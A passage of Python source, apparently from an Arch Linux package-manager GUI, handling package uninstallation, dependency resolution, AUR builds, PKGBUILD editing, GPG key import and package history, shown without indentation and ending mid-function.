def _request_unncessary_uninstall_confirmation(self, unnecessary: Iterable[str], watcher: ProcessWatcher) -> Optional[Set[str]]:
reqs = [InputOption(label=p, value=p, icon_path=get_icon_path(), read_only=False) for p in unnecessary]
reqs_select = MultipleSelectComponent(options=reqs, default_options=set(reqs), label="", max_per_line=3 if len(reqs) > 9 else 1)
if not watcher.request_confirmation(title=self.i18n['arch.uninstall.unnecessary.l1'].capitalize(),
body='<p>{}</p>'.format(self.i18n['arch.uninstall.unnecessary.l2'] + ':'),
components=[reqs_select],
deny_label=self.i18n['arch.uninstall.unnecessary.proceed'].capitalize(),
confirmation_label=self.i18n['arch.uninstall.unnecessary.cancel'].capitalize(),
window_cancel=False):
return {*reqs_select.get_selected_values()}
def _request_all_unncessary_uninstall_confirmation(self, pkgs: Collection[str], context: TransactionContext):
reqs = [InputOption(label=p, value=p, icon_path=get_icon_path(), read_only=True) for p in pkgs]
reqs_select = MultipleSelectComponent(options=reqs, default_options=set(reqs), label="", max_per_line=1)
if not context.watcher.request_confirmation(title=self.i18n['confirmation'].capitalize(),
body=self.i18n['arch.uninstall.unnecessary.all'].format(bold(str(len(pkgs)))),
components=[reqs_select],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize(),
window_cancel=False):
context.watcher.print("Aborted")
return False
return True
def _uninstall(self, context: TransactionContext, names: Set[str], remove_unneeded: bool = False, disk_loader: Optional[DiskCacheLoader] = None, skip_requirements: bool = False):
self._update_progress(context, 10)
net_available = self.context.internet_checker.is_available() if disk_loader else True
hard_requirements = set()
if not skip_requirements:
for n in names:
try:
pkg_reqs = pacman.list_hard_requirements(n, self.logger)
if pkg_reqs:
hard_requirements.update(pkg_reqs)
except PackageInHoldException:
context.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.uninstall.error.hard_dep_in_hold'].format(bold(n)),
type_=MessageType.ERROR)
return False
self._update_progress(context, 25)
to_uninstall = set()
to_uninstall.update(names)
if hard_requirements:
to_uninstall.update(hard_requirements)
if not self._request_uninstall_confirmation(to_uninstall=names,
required=hard_requirements,
watcher=context.watcher):
return False
if not skip_requirements and remove_unneeded:
unnecessary_packages = pacman.list_post_uninstall_unneeded_packages(to_uninstall)
self.logger.info("Checking unnecessary optdeps")
if context.config['suggest_optdep_uninstall']:
unnecessary_packages.update(self._list_opt_deps_with_no_hard_requirements(source_pkgs=to_uninstall))
self.logger.info("Packages no longer needed found: {}".format(len(unnecessary_packages)))
else:
unnecessary_packages = None
self._update_progress(context, 50)
if disk_loader and to_uninstall: # loading package instances in case the uninstall succeeds
instances = self.read_installed(disk_loader=disk_loader,
names={n for n in to_uninstall},
internet_available=net_available).installed
if len(instances) != len(to_uninstall):
self.logger.warning("Not all packages to be uninstalled could be read")
else:
instances = None
uninstalled = self._uninstall_pkgs(to_uninstall, context.root_password, context.handler, ignore_dependencies=skip_requirements)
if uninstalled:
if disk_loader: # loading package instances in case the uninstall succeeds
if instances:
for p in instances:
context.removed[p.name] = p
self._update_progress(context, 70)
if unnecessary_packages:
unnecessary_to_uninstall = self._request_unncessary_uninstall_confirmation(unnecessary=unnecessary_packages,
watcher=context.watcher)
if unnecessary_to_uninstall:
context.watcher.change_substatus(self.i18n['arch.checking_unnecessary_deps'])
unnecessary_requirements = set()
for pkg in unnecessary_to_uninstall:
try:
pkg_reqs = pacman.list_hard_requirements(pkg)
if pkg_reqs:
unnecessary_requirements.update(pkg_reqs)
except PackageInHoldException:
context.watcher.show_message(title=self.i18n['warning'].capitalize(),
body=self.i18n['arch.uninstall.error.hard_dep_in_hold'].format(bold(p)),
type_=MessageType.WARNING)
all_unnecessary_to_uninstall = {*unnecessary_to_uninstall, *unnecessary_requirements}
if not unnecessary_requirements or self._request_all_unncessary_uninstall_confirmation(all_unnecessary_to_uninstall, context):
if disk_loader: # loading package instances in case the uninstall succeeds
unnecessary_instances = self.read_installed(disk_loader=disk_loader,
internet_available=net_available,
names=all_unnecessary_to_uninstall).installed
else:
unnecessary_instances = None
unneded_uninstalled = self._uninstall_pkgs(all_unnecessary_to_uninstall, context.root_password, context.handler)
if unneded_uninstalled:
to_uninstall.update(all_unnecessary_to_uninstall)
if disk_loader and unnecessary_instances: # loading package instances in case the uninstall succeeds
for p in unnecessary_instances:
context.removed[p.name] = p
else:
self.logger.error("Could not uninstall some unnecessary packages")
context.watcher.print("Could not uninstall some unnecessary packages")
self._update_progress(context, 90)
if bool(context.config['clean_cached']): # cleaning old versions
context.watcher.change_substatus(self.i18n['arch.uninstall.clean_cached.substatus'])
if os.path.isdir('/var/cache/pacman/pkg'):
for p in to_uninstall:
available_files = glob.glob("/var/cache/pacman/pkg/{}-*.pkg.tar.*".format(p))
if available_files and not context.handler.handle_simple(SimpleProcess(cmd=['rm', '-rf', *available_files],
root_password=context.root_password)):
context.watcher.show_message(title=self.i18n['error'],
body=self.i18n['arch.uninstall.clean_cached.error'].format(bold(p)),
type_=MessageType.WARNING)
self._revert_ignored_updates(to_uninstall)
self._remove_from_editable_pkgbuilds(context.name)
self._update_progress(context, 100)
return uninstalled
def uninstall(self, pkg: ArchPackage, root_password: str, watcher: ProcessWatcher, disk_loader: DiskCacheLoader) -> TransactionResult:
self.aur_client.clean_caches()
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return TransactionResult.fail()
removed = {}
arch_config = self.configman.get_config()
success = self._uninstall(TransactionContext(change_progress=True,
arch_config=arch_config,
watcher=watcher,
root_password=root_password,
handler=handler,
removed=removed,
aur_supported=pkg.repository == 'aur' or aur.is_supported(arch_config)),
remove_unneeded=arch_config['suggest_unneeded_uninstall'],
names={pkg.name},
disk_loader=disk_loader) # to be able to return all uninstalled packages
if success:
return TransactionResult(success=True, installed=None, removed=[*removed.values()] if removed else [])
else:
return TransactionResult.fail()
def get_managed_types(self) -> Set["type"]:
return {ArchPackage}
def _get_info_aur_pkg(self, pkg: ArchPackage) -> dict:
fill_pkgbuild = Thread(target=self.aur_mapper.fill_package_build, args=(pkg,), daemon=True)
fill_pkgbuild.start()
if pkg.installed:
info = pacman.get_info_dict(pkg.name)
if info is not None:
self._parse_dates_string_from_info(pkg.name, info)
if pkg.commit:
info['commit'] = pkg.commit
if pkg.last_modified:
info['last_modified'] = self._parse_timestamp(ts=pkg.last_modified,
error_msg="Could not parse AUR package '{}' 'last_modified' field ({})".format(pkg.name, pkg.last_modified))
info['14_installed_files'] = pacman.list_installed_files(pkg.name)
fill_pkgbuild.join()
if pkg.pkgbuild:
info['13_pkg_build'] = pkg.pkgbuild
return info
else:
info = {
'01_id': pkg.id,
'02_name': pkg.name,
'03_description': pkg.description,
'03_version': pkg.version,
'04_popularity': pkg.popularity,
'05_votes': pkg.votes,
'06_package_base': pkg.package_base,
'07_maintainer': pkg.maintainer,
'10_url': pkg.url_download
}
if pkg.first_submitted:
info['08_first_submitted'] = self._parse_timestamp(ts=pkg.first_submitted,
error_msg="Could not parse AUR package '{}' 'first_submitted' field".format(pkg.name, pkg.first_submitted))
if pkg.last_modified:
info['09_last_modified'] = self._parse_timestamp(ts=pkg.last_modified,
error_msg="Could not parse AUR package '{}' 'last_modified' field ({})".format(pkg.name, pkg.last_modified))
srcinfo = self.aur_client.get_src_info(pkg.name)
if srcinfo:
arch_str = 'x86_64' if self.context.is_system_x86_64() else 'i686'
for info_attr, src_attr in {'12_makedepends': 'makedepends',
'13_dependson': 'depends',
'14_optdepends': 'optdepends',
'checkdepends': '15_checkdepends'}.items():
if srcinfo.get(src_attr):
info[info_attr] = [*srcinfo[src_attr]]
arch_attr = '{}_{}'.format(src_attr, arch_str)
if srcinfo.get(arch_attr):
if not info.get(info_attr):
info[info_attr] = [*srcinfo[arch_attr]]
else:
info[info_attr].extend(srcinfo[arch_attr])
fill_pkgbuild.join()
if pkg.pkgbuild:
info['00_pkg_build'] = pkg.pkgbuild
else:
info['11_pkg_build_url'] = pkg.get_pkg_build_url()
return info
def _parse_dates_string_from_info(self, pkgname: str, info: dict):
for date_attr in ('install date', 'build date'):
en_date_str = info.get(date_attr)
if en_date_str:
try:
info[date_attr] = parse_date(en_date_str)
except ValueError:
self.logger.error("Could not parse date attribute '{}' ({}) from package '{}'".format(date_attr, en_date_str, pkgname))
def _parse_timestamp(self, ts: int, error_msg: str) -> datetime:
if ts:
try:
return datetime.fromtimestamp(ts)
except ValueError:
if error_msg:
self.logger.error(error_msg)
def _get_info_repo_pkg(self, pkg: ArchPackage) -> dict:
info = pacman.get_info_dict(pkg.name, remote=not pkg.installed)
if info is not None:
self._parse_dates_string_from_info(pkg.name, info)
if pkg.installed:
info['installed files'] = pacman.list_installed_files(pkg.name)
return info
def get_info(self, pkg: ArchPackage) -> dict:
if pkg.repository == 'aur':
return self._get_info_aur_pkg(pkg)
else:
return self._get_info_repo_pkg(pkg)
def _get_history_aur_pkg(self, pkg: ArchPackage) -> PackageHistory:
if pkg.commit:
self.logger.info("Package '{}' current commit {}".format(pkg.name, pkg.commit))
else:
self.logger.warning("Package '{}' has no commit associated with it. Current history status may not be correct.".format(pkg.name))
arch_config = self.configman.get_config()
temp_dir = '{}/build_{}'.format(get_build_dir(arch_config), int(time.time()))
try:
Path(temp_dir).mkdir(parents=True)
base_name = pkg.get_base_name()
run_cmd('git clone ' + URL_GIT.format(base_name), print_error=False, cwd=temp_dir)
clone_path = '{}/{}'.format(temp_dir, base_name)
srcinfo_path = '{}/.SRCINFO'.format(clone_path)
if not os.path.exists(srcinfo_path):
return PackageHistory.empyt(pkg)
logs = git.log_shas_and_timestamps(clone_path)
if logs:
srcfields = {'epoch', 'pkgver', 'pkgrel'}
history, status_idx = [], -1
for idx, log in enumerate(logs):
commit, timestamp = log[0], log[1]
with open(srcinfo_path) as f:
pkgsrc = aur.map_srcinfo(string=f.read(), pkgname=pkg.name, fields=srcfields)
epoch, version, release = pkgsrc.get('epoch'), pkgsrc.get('pkgver'), pkgsrc.get('pkgrel')
pkgver = '{}:{}'.format(epoch, version) if epoch is not None else version
current_version = '{}-{}'.format(pkgver, release)
if status_idx < 0:
if pkg.commit:
status_idx = idx if pkg.commit == commit else -1
else:
status_idx = idx if current_version == pkg.version else -1
history.append({'1_version': pkgver, '2_release': release,
'3_date': datetime.fromtimestamp(timestamp)}) # the number prefix is to ensure the rendering order
if idx + 1 < len(logs):
if not run_cmd('git reset --hard ' + logs[idx + 1][0], cwd=clone_path):
break
return PackageHistory(pkg=pkg, history=history, pkg_status_idx=status_idx)
finally:
if os.path.exists(temp_dir):
shutil.rmtree(temp_dir)
def _get_history_repo_pkg(self, pkg: ArchPackage) -> PackageHistory:
data = PackageHistory(pkg=pkg, history=[], pkg_status_idx=-1)
versions = [pkg.latest_version]
version_files = {} # maps the version and tar file
if pkg.update:
versions.append(pkg.version)
if os.path.isdir('/var/cache/pacman/pkg'):
available_files = glob.glob("/var/cache/pacman/pkg/{}-*.pkg.tar.*".format(pkg.name))
if available_files:
reg = re.compile(r'{}-([\w.\-]+)-(x86_64|any|i686).pkg'.format(pkg.name))
for file_path in available_files:
found = reg.findall(os.path.basename(file_path))
if found:
ver = found[0][0]
if ver not in versions:
versions.append(ver)
version_files[ver] = file_path
versions.sort(reverse=True)
extract_path = '{}/arch/history'.format(TEMP_DIR)
try:
Path(extract_path).mkdir(parents=True, exist_ok=True)
except:
self.logger.error("Could not create temp dir {} to extract previous versions data".format(extract_path))
traceback.print_exc()
return data
try:
for idx, v in enumerate(versions):
cur_version = v.split('-')
cur_data = {'1_version': ''.join(cur_version[0:-1]),
'2_release': cur_version[-1],
'3_date': ''}
if pkg.version == v:
data.pkg_status_idx = idx
version_file = version_files.get(v)
if not version_file:
if v == pkg.version:
cur_data['3_date'] = pacman.get_build_date(pkg.name)
else:
extracted_dir = '{}/{}'.format(extract_path, v)
Path(extracted_dir).mkdir(parents=True, exist_ok=True)
try:
filext = version_file.split('.')[-1]
run_cmd('tar -C {} -I {} -xvf {} .PKGINFO'.format(extracted_dir, 'zstd' if filext == 'zst' else filext, version_file))
except tarfile.ReadError:
if v == pkg.version:
cur_data['3_date'] = pacman.get_build_date(pkg.name)
else:
self.logger.error("Could not read file {}. Skipping version {}".format(version_file, v))
continue
info_file = '{}/.PKGINFO'.format(extracted_dir)
if os.path.isfile(info_file):
with open(info_file) as f:
for l in f.readlines():
if l and l.startswith('builddate'):
cur_data['3_date'] = datetime.fromtimestamp(int(l.split('=')[1].strip()))
break
data.history.append(cur_data)
return data
finally:
if os.path.exists(extract_path):
try:
self.logger.info("Removing temporary history dir {}".format(extract_path))
shutil.rmtree(extract_path)
except:
self.logger.error("Could not remove temp path '{}'".format(extract_path))
raise
def get_history(self, pkg: ArchPackage) -> PackageHistory:
if pkg.repository == 'aur':
return self._get_history_aur_pkg(pkg)
else:
return self._get_history_repo_pkg(pkg)
def _request_conflict_resolution(self, pkg: str, conflicting_pkg: str, context: TransactionContext, skip_requirements: bool = False) -> bool:
conflict_msg = '{} {} {}'.format(bold(pkg), self.i18n['and'], bold(conflicting_pkg))
if not context.watcher.request_confirmation(title=self.i18n['arch.install.conflict.popup.title'],
body=self.i18n['arch.install.conflict.popup.body'].format(conflict_msg)):
context.watcher.print(self.i18n['action.cancelled'])
return False
else:
context.watcher.change_substatus(self.i18n['arch.uninstalling.conflict'].format(bold(conflicting_pkg)))
context.disable_progress_if_changing()
if context.removed is None:
context.removed = {}
res = self._uninstall(context=context, names={conflicting_pkg}, disk_loader=context.disk_loader,
remove_unneeded=False, skip_requirements=skip_requirements)
context.restabilish_progress()
return res
def _install_deps(self, context: TransactionContext, deps: List[Tuple[str, str]]) -> Iterable[str]:
progress_increment = int(100 / len(deps))
progress = 0
self._update_progress(context, 1)
repo_deps, repo_dep_names, aur_deps_context = [], None, []
for dep in deps:
context.watcher.change_substatus(self.i18n['arch.install.dependency.install'].format(bold('{} ({})'.format(dep[0], dep[1]))))
if dep[1] == 'aur':
dep_context = context.gen_dep_context(dep[0], dep[1])
dep_src = self.aur_client.get_src_info(dep[0])
dep_context.base = dep_src['pkgbase']
aur_deps_context.append(dep_context)
else:
repo_deps.append(dep)
if repo_deps:
repo_dep_names = [d[0] for d in repo_deps]
if context.dependency:
context.watcher.change_substatus(self.i18n['arch.substatus.conflicts'])
else:
context.watcher.change_substatus(self.i18n['arch.checking.conflicts'].format(bold(context.name)))
all_provided = context.get_provided_map()
for dep, data in pacman.map_conflicts_with(repo_dep_names, remote=True).items():
if data and data['c']:
for c in data['c']:
source_conflict = all_provided.get(c)
if source_conflict:
conflict_pkg = [*source_conflict][0]
if dep != conflict_pkg:
if not self._request_conflict_resolution(dep, conflict_pkg, context,
skip_requirements=data['r'] and conflict_pkg in data['r']):
return {dep}
downloaded = 0
if self._multithreaded_download_enabled(context.config):
try:
pkg_sizes = pacman.map_download_sizes(repo_dep_names)
downloaded = self._download_packages(repo_dep_names, context.handler, context.root_password, pkg_sizes, multithreaded=True)
except ArchDownloadException:
return False
status_handler = TransactionStatusHandler(watcher=context.watcher, i18n=self.i18n, names={*repo_dep_names},
logger=self.logger, percentage=len(repo_deps) > 1, downloading=downloaded)
status_handler.start()
installed, _ = context.handler.handle_simple(pacman.install_as_process(pkgpaths=repo_dep_names,
root_password=context.root_password,
file=False),
output_handler=status_handler.handle)
if installed:
pkg_map = {d[0]: ArchPackage(name=d[0], repository=d[1], maintainer=d[1],
categories=self.categories.get(d[0])) for d in repo_deps}
disk.write_several(pkg_map, overwrite=True, maintainer=None)
progress += len(repo_deps) * progress_increment
self._update_progress(context, progress)
else:
return repo_dep_names
for aur_context in aur_deps_context:
installed = self._install_from_aur(aur_context)
if not installed:
return {aur_context.name}
else:
progress += progress_increment
self._update_progress(context, progress)
self._update_progress(context, 100)
def _map_repos(self, pkgnames: Collection[str]) -> dict:
pkg_repos = pacman.get_repositories(pkgnames) # getting repositories set
if len(pkgnames) != len(pkg_repos): # checking if any dep not found in the distro repos are from AUR
norepos = {p for p in pkgnames if p not in pkg_repos}
for pkginfo in self.aur_client.get_info(norepos):
if pkginfo.get('Name') in norepos:
pkg_repos[pkginfo['Name']] = 'aur'
return pkg_repos
def _pre_download_source(self, pkgname: str, project_dir: str, watcher: ProcessWatcher) -> bool:
if self.context.file_downloader.is_multithreaded():
with open('{}/.SRCINFO'.format(project_dir)) as f:
srcinfo = aur.map_srcinfo(string=f.read(), pkgname=pkgname)
pre_download_files = []
for attr in SOURCE_FIELDS:
if srcinfo.get(attr):
if attr == 'source_x86_x64' and not self.context.is_system_x86_64():
continue
else:
for f in srcinfo[attr]:
if RE_PRE_DOWNLOAD_WL_PROTOCOLS.match(f) and not RE_PRE_DOWNLOAD_BL_EXT.match(f):
pre_download_files.append(f)
if pre_download_files:
for f in pre_download_files:
fdata = f.split('::')
args = {'watcher': watcher, 'cwd': project_dir}
if len(fdata) > 1:
args.update({'file_url': fdata[1], 'output_path': fdata[0]})
else:
args.update({'file_url': fdata[0], 'output_path': fdata[0].split('/')[-1]})
if not self.context.file_downloader.download(**args):
watcher.print('Could not download source file {}'.format(args['file_url']))
return False
return True
def _display_pkgbuild_for_editing(self, pkgname: str, watcher: ProcessWatcher, pkgbuild_path: str) -> bool:
with open(pkgbuild_path) as f:
pkgbuild = f.read()
pkgbuild_input = TextInputComponent(label='', value=pkgbuild, type_=TextInputType.MULTIPLE_LINES,
min_width=500, min_height=350)
watcher.request_confirmation(title='PKGBUILD ({})'.format(pkgname),
body='',
components=[pkgbuild_input],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_button=False)
if pkgbuild_input.get_value() != pkgbuild:
with open(pkgbuild_path, 'w+') as f:
f.write(pkgbuild_input.get_value())
return makepkg.update_srcinfo('/'.join(pkgbuild_path.split('/')[0:-1]))
return False
def _ask_for_pkgbuild_edition(self, pkgname: str, arch_config: dict, watcher: ProcessWatcher, pkgbuild_path: str) -> bool:
if pkgbuild_path:
if arch_config['edit_aur_pkgbuild'] is None:
if not watcher.request_confirmation(title=self.i18n['confirmation'].capitalize(),
body=self.i18n['arch.aur.action.edit_pkgbuild.body'].format(bold(pkgname)),
confirmation_label=self.i18n['no'].capitalize(),
deny_label=self.i18n['yes'].capitalize()):
return self._display_pkgbuild_for_editing(pkgname, watcher, pkgbuild_path)
elif arch_config['edit_aur_pkgbuild']:
return self._display_pkgbuild_for_editing(pkgname, watcher, pkgbuild_path)
return False
def _edit_pkgbuild_and_update_context(self, context: TransactionContext):
if context.new_pkg or context.name in self._read_editable_pkgbuilds():
if self._ask_for_pkgbuild_edition(pkgname=context.name,
arch_config=context.config,
watcher=context.watcher,
pkgbuild_path='{}/PKGBUILD'.format(context.project_dir)):
context.pkgbuild_edited = True
srcinfo = aur.map_srcinfo(string=makepkg.gen_srcinfo(context.project_dir), pkgname=context.name)
if srcinfo:
context.name = srcinfo['pkgname']
context.base = srcinfo['pkgbase']
if context.pkg:
for pkgattr, srcattr in {'name': 'pkgname',
'package_base': 'pkgbase',
'version': 'pkgversion',
'latest_version': 'pkgversion',
'license': 'license',
'description': 'pkgdesc'}.items():
setattr(context.pkg, pkgattr, srcinfo.get(srcattr, getattr(context.pkg, pkgattr)))
def _read_srcinfo(self, context: TransactionContext) -> str:
src_path = '{}/.SRCINFO'.format(context.project_dir)
if not os.path.exists(src_path):
srcinfo = makepkg.gen_srcinfo(context.project_dir, context.custom_pkgbuild_path)
with open(src_path, 'w+') as f:
f.write(srcinfo)
else:
with open(src_path) as f:
srcinfo = f.read()
return srcinfo
def _build(self, context: TransactionContext) -> bool:
self._edit_pkgbuild_and_update_context(context)
self._pre_download_source(context.name, context.project_dir, context.watcher)
self._update_progress(context, 50)
context.custom_pkgbuild_path = self._gen_custom_pkgbuild_if_required(context)
if not self._handle_aur_package_deps_and_keys(context):
return False
# building main package
context.watcher.change_substatus(self.i18n['arch.building.package'].format(bold(context.name)))
optimize = bool(context.config['optimize']) and cpu_manager.supports_performance_mode()
cpus_changed, cpu_prev_governors = False, None
if optimize:
cpus_changed, cpu_prev_governors = cpu_manager.set_all_cpus_to('performance', context.root_password, self.logger)
try:
pkgbuilt, output = makepkg.make(pkgdir=context.project_dir,
optimize=optimize,
handler=context.handler,
custom_pkgbuild=context.custom_pkgbuild_path)
finally:
if cpus_changed and cpu_prev_governors:
self.logger.info("Restoring CPU governors")
cpu_manager.set_cpus(cpu_prev_governors, context.root_password, {'performance'}, self.logger)
self._update_progress(context, 65)
if pkgbuilt:
self.__fill_aur_output_files(context)
self.logger.info("Reading '{}' cloned repository current commit".format(context.name))
context.commit = git.get_current_commit(context.project_dir)
if not context.commit:
self.logger.error("Could not read '{}' cloned repository current commit".format(context.name))
if self._install(context=context):
self._save_pkgbuild(context)
if context.update_aur_index:
self._update_aur_index(context.watcher)
if context.dependency or context.skip_opt_deps:
return True
context.watcher.change_substatus(self.i18n['arch.optdeps.checking'].format(bold(context.name)))
self._update_progress(context, 100)
if self._install_optdeps(context):
return True
return False
def _update_aur_index(self, watcher: ProcessWatcher):
if self.context.internet_checker.is_available():
if watcher:
watcher.change_substatus(self.i18n['arch.task.aur.index.status'])
idx_updater = AURIndexUpdater(context=self.context, taskman=TaskManager()) # null task manager
idx_updater.update_index()
else:
self.logger.warning("Could not update the AUR index: no internet connection detected")
def __fill_aur_output_files(self, context: TransactionContext):
self.logger.info("Determining output files of '{}'".format(context.name))
context.watcher.change_substatus(self.i18n['arch.aur.build.list_output'])
output_files = {f for f in makepkg.list_output_files(context.project_dir, context.custom_pkgbuild_path) if os.path.isfile(f)}
if output_files:
context.install_files = output_files
else:
gen_file = [fname for root, dirs, files in os.walk(context.build_dir) for fname in files if
re.match(r'^{}-.+\.tar\.(xz|zst)'.format(context.name), fname)]
if not gen_file:
context.watcher.print('Could not find the built package. Aborting...')
return False
file_to_install = gen_file[0]
if len(gen_file) > 1:
srcinfo = aur.map_srcinfo(string=makepkg.gen_srcinfo(context.project_dir), pkgname=context.name)
pkgver = '-{}'.format(srcinfo['pkgver']) if srcinfo.get('pkgver') else ''
pkgrel = '-{}'.format(srcinfo['pkgrel']) if srcinfo.get('pkgrel') else ''
arch = '-{}'.format(srcinfo['arch']) if srcinfo.get('arch') else ''
name_start = '{}{}{}{}'.format(context.name, pkgver, pkgrel, arch)
perfect_match = [f for f in gen_file if f.startswith(name_start)]
if perfect_match:
file_to_install = perfect_match[0]
context.install_files = {'{}/{}'.format(context.project_dir, file_to_install)}
context.watcher.change_substatus('')
def _save_pkgbuild(self, context: TransactionContext):
cache_path = ArchPackage.disk_cache_path(context.name)
if not os.path.exists(cache_path):
try:
os.mkdir(cache_path)
except:
print("Could not create cache directory '{}'".format(cache_path))
traceback.print_exc()
return
src_pkgbuild = '{}/PKGBUILD'.format(context.project_dir)
dest_pkgbuild = '{}/PKGBUILD'.format(cache_path)
try:
shutil.copy(src_pkgbuild, dest_pkgbuild)
except:
context.watcher.print("Could not copy '{}' to '{}'".format(src_pkgbuild, dest_pkgbuild))
traceback.print_exc()
def _ask_and_install_missing_deps(self, context: TransactionContext, missing_deps: List[Tuple[str, str]]) -> bool:
context.watcher.change_substatus(self.i18n['arch.missing_deps_found'].format(bold(context.name)))
if not confirmation.request_install_missing_deps(context.name, missing_deps, context.watcher, self.i18n):
context.watcher.print(self.i18n['action.cancelled'])
return False
old_progress_behavior = context.change_progress
context.change_progress = False
deps_not_installed = self._install_deps(context, missing_deps)
context.change_progress = old_progress_behavior
if deps_not_installed:
message.show_deps_not_installed(context.watcher, context.name, deps_not_installed, self.i18n)
return False
context.installed.update({d[0] for d in missing_deps})
return True
def _list_missing_deps(self, context: TransactionContext) -> List[Tuple[str, str]]:
context.watcher.change_substatus(self.i18n['arch.checking.deps'].format(bold(context.name)))
ti = time.time()
if context.repository == 'aur':
srcinfo = aur.map_srcinfo(string=self._read_srcinfo(context),
pkgname=context.name if (not context.pkgs_to_build or len(context.pkgs_to_build) == 1) else None)
if context.pkgs_to_build and len(context.pkgs_to_build) > 1: # removing self dependencies from srcinfo
for attr in ('depends', 'makedepends', 'optdepends'):
dep_list = srcinfo.get(attr)
if dep_list and isinstance(dep_list, list):
to_remove = set()
for dep in dep_list:
dep_name = RE_DEP_OPERATORS.split(dep.split(':')[0])[0].strip()
if dep_name and dep_name in context.pkgs_to_build:
to_remove.add(dep)
for dep in to_remove:
dep_list.remove(dep)
pkgs_data = {context.name: self.aur_client.map_update_data(context.name, context.get_version(), srcinfo)}
else:
pkgs_data = pacman.map_updates_data(context.get_packages_paths(), files=bool(context.install_files))
deps_data, alread_checked_deps = {}, set()
missing_deps = self.deps_analyser.map_missing_deps(pkgs_data=pkgs_data,
provided_map=context.get_provided_map(),
aur_index=context.get_aur_idx(self.aur_client),
deps_checked=alread_checked_deps,
deps_data=deps_data,
sort=True,
remote_provided_map=context.get_remote_provided_map(),
remote_repo_map=context.get_remote_repo_map(),
automatch_providers=context.config['automatch_providers'],
watcher=context.watcher)
tf = time.time()
self.logger.info("Took {0:.2f} seconds to check for missing dependencies".format(tf - ti))
return missing_deps
def _handle_missing_deps(self, context: TransactionContext) -> bool:
try:
missing_deps = self._list_missing_deps(context)
except PackageNotFoundException:
return False
except:
traceback.print_exc()
return False
if missing_deps is None:
return False # called off by the user
if not missing_deps:
return True
elif not self._ask_and_install_missing_deps(context=context, missing_deps=missing_deps):
return False # called off by the user or something went wrong
else:
return True
def _handle_aur_package_deps_and_keys(self, context: TransactionContext) -> bool:
handled_deps = self._handle_missing_deps(context)
if not handled_deps:
return False
check_res = makepkg.check(context.project_dir,
optimize=bool(context.config['optimize']),
missing_deps=False,
handler=context.handler,
custom_pkgbuild=context.custom_pkgbuild_path)
if check_res:
if check_res.get('gpg_key'):
if context.watcher.request_confirmation(title=self.i18n['arch.install.aur.unknown_key.title'],
body=self.i18n['arch.install.aur.unknown_key.body'].format(bold(context.name), bold(check_res['gpg_key']))):
context.watcher.change_substatus(self.i18n['arch.aur.install.unknown_key.status'].format(bold(check_res['gpg_key'])))
self.logger.info("Importing GPG key {}".format(check_res['gpg_key']))
gpg_res = self.context.http_client.get(URL_GPG_SERVERS)
gpg_server = gpg_res.text.split('\n')[0] if gpg_res else None
if not context.handler.handle(gpg.receive_key(check_res['gpg_key'], gpg_server)):
self.logger.error("An error occurred while importing the GPG key {}".format(check_res['gpg_key']))
context.watcher.show_message(title=self.i18n['error'].capitalize(),
body=self.i18n['arch.aur.install.unknown_key.receive_error'].format(bold(check_res['gpg_key'])))
return False
else:
context.watcher.print(self.i18n['action.cancelled'])
return False
if check_res.get('validity_check'):
body = "<p>{}</p><p>{}</p>".format(self.i18n['arch.aur.install.validity_check.body'].format(bold(context.name)),
self.i18n['arch.aur.install.validity_check.proceed'])
return not context.watcher.request_confirmation(title=self.i18n['arch.aur.install.validity_check.title'].format('( checksum )'),
body=body,
confirmation_label=self.i18n['no'].capitalize(),
deny_label=self.i18n['yes'].capitalize())
return True
def _install_optdeps(self, context: TransactionContext) -> bool:
odeps = pacman.map_optional_deps({context.name}, remote=False, not_installed=True).get(context.name)
if not odeps:
return True
repo_mapping = self._map_repos(odeps.keys())
if repo_mapping:
final_optdeps = {dep: {'desc': odeps.get(dep), 'repository': repo_mapping.get(dep)} for dep, repository in repo_mapping.items() if repo_mapping.get(dep)}
deps_to_install = confirmation.request_optional_deps(context.name, final_optdeps, context.watcher, self.i18n)
if not deps_to_install:
return True
else:
deps_data = {}
opt_repo_deps, aur_threads = [], []
for dep in deps_to_install:
if repo_mapping[dep] == 'aur':
t = Thread(target=self.aur_client.fill_update_data, args=(deps_data, dep, None, None), daemon=True)
t.start()
aur_threads.append(t)
else:
opt_repo_deps.append(dep)
if opt_repo_deps:
deps_data.update(pacman.map_updates_data(opt_repo_deps))
for t in aur_threads:
t.join()
provided_map = pacman.map_provided()
remote_provided_map = pacman.map_provided(remote=True)
remote_repo_map = pacman.map_repositories()
aur_index = self.aur_client.read_index() if aur_threads else None
subdeps_data = {}
missing_deps = self.deps_analyser.map_missing_deps(pkgs_data=deps_data,
provided_map=provided_map,
aur_index=aur_index,
deps_checked=set(),
deps_data=subdeps_data,
watcher=context.watcher,
remote_provided_map=remote_provided_map,
remote_repo_map=remote_repo_map,
automatch_providers=context.config['automatch_providers'],
sort=False)
if missing_deps is None:
return False # called of by the user
to_sort = []
if missing_deps:
for dep in missing_deps:
# TODO handle multiple providers for a missing dep
if dep[0] not in deps_to_install and dep[1] != '__several__':
to_sort.append(dep[0])
display_deps_dialog = bool(to_sort) # it means there are subdeps to be installed so a new dialog should be displayed
to_sort.extend(deps_data.keys())
sorted_deps = sorting.sort(to_sort, {**deps_data, **subdeps_data}, provided_map)
if display_deps_dialog and not confirmation.request_install_missing_deps(None, sorted_deps, context.watcher, self.i18n):
context.watcher.print(self.i18n['action.cancelled'])
return True # because the main package installation was successful
old_progress_behavior = context.change_progress
context.change_progress = True
context.dependency = True
deps_not_installed = self._install_deps(context, sorted_deps)
context.change_progress = old_progress_behavior
if deps_not_installed:
message.show_optdeps_not_installed(deps_not_installed, context.watcher, self.i18n)
else:
context.installed.update({dep[0] for dep in sorted_deps})
return True
def _multithreaded_download_enabled(self, arch_config: dict) -> bool:
return bool(arch_config['repositories_mthread_download']) \
and self.context.file_downloader.is_multithreaded() \
and pacman.is_mirrors_available()
def _download_packages(self, pkgnames: List[str], handler: ProcessHandler, root_password: str, sizes: Dict[str, int] = None, multithreaded: bool = True) -> int:
if multithreaded:
download_service = MultithreadedDownloadService(file_downloader=self.context.file_downloader,
http_client=self.http_client,
logger=self.context.logger,
i18n=self.i18n)
self.logger.info("Initializing multi-threaded download for {} repository package(s)".format(len(pkgnames)))
return download_service.download_packages(pkgs=pkgnames,
handler=handler,
sizes=sizes,
root_password=root_password)
else:
